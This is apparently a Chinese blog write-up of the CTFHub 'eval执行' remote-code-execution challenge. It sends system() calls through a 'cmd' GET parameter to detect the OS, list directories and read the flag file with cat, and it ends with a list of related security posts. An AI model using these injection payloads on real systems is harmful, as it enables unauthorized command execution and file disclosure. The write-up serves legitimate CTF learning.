CTFHub-RCE eval执行

观察源代码

  • 我们可以发现源代码是request请求,所以我们可以通过GET或者POST请求,利用cmd参数进行命令执行

判断是Windows还是Linux

复制代码
#### 用GET请求

![](https://i-blog.csdnimg.cn/img_convert/3953fb442538c15685b5aa6926a79cba.jpeg)
*

  ```php
  /?cmd=system('ipconfig');
  ```

<!-- -->

* 无回显 说明不是Windows系统 ![](https://i-blog.csdnimg.cn/img_convert/0b03e2d748cacda3d7860d5e27391c10.jpeg)

<!-- -->

*

  ```php
  /?cmd=system('ifconfig');
  ```

<!-- -->

* 可以发现有回显,说明命令执行成功,系统为Linux ![](https://i-blog.csdnimg.cn/img_convert/480728712941dd82146cac1a7ab842d3.jpeg)

查看有哪些文件

复制代码
```php
/?cmd=system('ls');
```

![](https://i-blog.csdnimg.cn/img_convert/24d60e2455ee4331bd91e436a1f8c719.jpeg)
  • 显示只有index.php文件, 我们再查询根目录下的文件
复制代码
```php
/?cmd=system('ls /');
```
  • 发现目标flag文件

打开flag文件

复制代码
```php
/?cmd=system('cat /flag_11649');
```

![](https://i-blog.csdnimg.cn/img_convert/cb6bcfb2dbe991c3d366ba1b4b681326.jpeg)
  • 成功获取flag
相关推荐
zjeweler2 小时前
万字长文解析:构建从域名发现到框架识别的信息收集
网络安全·渗透测试·信息收集
派拉软件8 小时前
从 IAM 到 AAM,重构 AI Agent 时代的访问控制体系
大数据·人工智能·网络安全·重构·iam·身份与访问控制·aam
天山@1238 小时前
跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系
网络安全·xss·beef
сокол11 小时前
【网安-应急响应-基础记录】Linux入侵排查
linux·网络安全·系统安全
一名优秀的码农12 小时前
vulhub系列-83-Grotesque:1.0.1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
сокол12 小时前
【网安-Web渗透测试-Linux提权】SUID提权
linux·前端·web安全·网络安全
菩提小狗12 小时前
每日安全情报报告 · 2026-04-23
网络安全·漏洞·cve·安全情报·每日安全
捉鸭子12 小时前
某红书X-s X-s-common VMP逆向(算法还原)
python·web安全·网络安全·node.js·网络爬虫
白帽黑客-晨哥13 小时前
从零到网安专家:CSB湖南网安基地专业篇,开启网络安全黄金赛道
web安全·网络安全·网络安全工程师·网安湘军杯